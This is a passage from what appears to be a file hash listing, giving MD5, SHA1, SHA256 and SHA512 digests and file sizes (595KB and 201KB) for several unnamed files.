  SHA1: 3cc6c4ac64112a771ccd3235e313dcfcdc7a78d9
  SHA256: a6195edcc520035e9baf76f120fa62909ccea148a3a4596d81cda06e08fef962
  SHA512: 648d70c844d4425c5a83882836ea65067e54eed181d355e950a267da5ad92343ef08a4cb4eccfe45aa8561be94ac686807c867d0e0cb438ddf5988e502923d34
- Filesize: 595KB
  MD5: 69b8138d0e9dd6b169043520330bceac
  SHA1: aabe9458e1751623e727fb775e923103a02afe7a
  SHA256: 01825f4cb340163af8d9f803a31dc20c1e33404ced73e17dbf74896d7ec1c34b
  SHA512: fa135dfec349bc9a3fd8348b2a60352a01ef27d73505550291953b2274994aff88a614fd225b97c2824fa05e91580ac7dd2292065a99514d17f731c0711574d0
- Filesize: 201KB
  MD5: d4f11c9a6a07f2a9ec69bc367b9243be
  SHA1: 63a5efac9bee6e1fd7de45fe10b5768c8fd9e382
  SHA256: 0dcf580f5f74465642419ae9f8c56ea2cb4116d8d2c37f4ee4e3dcd45c50f1f0
  SHA512: 14d061b2b6b486f0294c2228dd5badfbcd3296be59777449239201bcf3095b0c89eafe9e88683b1c924022ee795aee8e5b6483046a08d824f74d1061aa7846e0